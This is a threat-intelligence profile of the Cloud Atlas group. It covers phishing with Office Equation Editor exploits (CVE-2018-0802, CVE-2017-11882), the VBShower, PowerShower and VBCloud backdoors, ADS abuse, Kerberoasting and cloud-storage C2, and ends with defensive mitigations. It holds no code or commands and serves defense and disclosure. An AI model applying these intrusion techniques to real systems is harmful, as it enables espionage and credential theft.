Full Report
The threat actor known as Cloud Atlas has been observed using a previously undocumented malware called VBCloud as part of its cyber attack campaigns targeting "several dozen users" in 2024. "Victims get infected via phishing emails containing a malicious document that exploits a vulnerability in the formula editor (CVE-2018-0802) to download and execute malware code," Kaspersky researcher Oleg
Analysis Summary
# Threat Actor: Cloud Atlas
## Attribution & Identity
* **Identification:** Unattributed threat activity cluster.
* **Known Aliases:** Clean Ursa, Inception, Oxygen, Red October.
* **Associated Groups:** Active since 2014.
## Activity Summary
* **Recent Campaigns (2024):** Observed using a previously undocumented malware named VBCloud in cyber attack campaigns targeting several dozen users.
* **Historical Activities:**
* Linked to cyber attacks in December 2022 targeting Russia, Belarus, and Transnistria, deploying the PowerShower PowerShell-based backdoor.
* Conducted spear-phishing attacks in December 2023 against Russian entities exploiting CVE-2017-11882 to drop a VBS payload, leading to the deployment of VBShower, PowerShower, and VBCloud.
* **Overall Objective:** Ultimately aims to steal data from victims' devices.
## Tactics, Techniques & Procedures
* **Initial Access:** Phishing emails containing malicious Microsoft Office documents.
* **Exploitation:** Exploiting historical vulnerabilities in the Microsoft Office Equation Editor:
* CVE-2018-0802 (used for initial download/execution of malware code and HTA file).
* CVE-2017-11882 (used in past campaigns to drop VBS payload).
* **Execution & Persistence:**
* Downloading and executing malware via an RTF template that fetches an HTML Application (HTA) file.
* Abusing NTFS Alternate Data Streams (ADS) to extract and create VBShower backdoor components (%APPDATA%\\Roaming\\Microsoft\\Windows\\).
* VBCloud establishes persistence via a scheduled task triggered upon user login.
* **Defense Evasion:** VBShower includes a cleaner script to erase evidence, specifically wiping contents of the "\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\" folder and related components.
* **Lateral Movement & Credential Access:** PowerShower modules perform post-exploitation activities including:
* Gathering local group/member information via Active Directory Service Interfaces (ADSI).
* Conducting dictionary attacks on user accounts.
* Executing payloads to facilitate Kerberoasting attacks for obtaining Active Directory credentials.
* **Collection:**
* **PowerShower:** Probes the local network for further infiltration.
* **VBCloud:** Gathers system metadata, file information (DOC, DOCX, XLS, XLSX, PDF, TXT, RTF, RAR extensions), Telegram-related files, drive information (letter, type, size).
* **Backdoors Functionality:** The in-memory VBShower backdoor can reboot the system, gather running process/scheduler task information, and install PowerShower and VBCloud.
## Targeting
* **Sectors:** Not explicitly detailed, but the activity targets specific "users" and "entities."
* **Geography:**
* **Primary:** Russia (over 80% of targets).
* **Secondary:** Belarus, Canada, Moldova, Israel, Kyrgyzstan, Turkey, and Vietnam.
* **Victims:** "Several dozen users" targeted in 2024; various entities in Russia targeted in 2023.
## Tools & Infrastructure
* **Malware Families Used:**
* **VBCloud:** New backdoor utilizing public cloud storage for C2.
* **VBShower:** Multi-stage VBS backdoor/loader component.
* **PowerShower:** PowerShell-based backdoor used for reconnaissance and credential attacks.
* **Infrastructure:**
* Command-and-Control (C2) communications initially via a remote server hosting the exploit template/malware stages.
* VBCloud utilizes **public cloud storage services** for C2 communications.
## Implications
Cloud Atlas remains a sophisticated, state-adjacent threat actor showing a preference for exploiting legacy, known Microsoft Office vulnerabilities (Formula/Equation Editor flaws) to maintain initial access. Their TTPs demonstrate a multi-stage approach, combining VBScript-based file system manipulation (VBShower) and PowerShell for deep enumeration and credential harvesting (PowerShower, Kerberoasting). The introduction of VBCloud, which uses cloud storage for C2, indicates an adaptation to evade traditional network-based defenses.
## Mitigations
* **Patch Management:** Immediately patch systems against known MS Office Equation Editor vulnerabilities (CVE-2018-0802, CVE-2017-11882).
* **Email Security:** Strengthen email filtering and implement robust macro/script blocking policies for Office documents originating from external sources.
* **Endpoint Detection & Response (EDR):** Monitor for processes executing HTA files, creation of files within %APPDATA%\\Roaming\\Microsoft\\Windows\\ via file system monitoring, and the use of NTFS Alternate Data Streams.
* **Network Monitoring:** Monitor for outbound connections to known public cloud storage services that might be indicative of C2 traffic, particularly when initiated by unusual user processes.
* **Active Directory Security:** Implement strong credential hygiene, monitor for unusual Active Directory enumeration activities (ADSI calls), and enforce multi-factor authentication to mitigate the impact of any successful Kerberoasting attacks.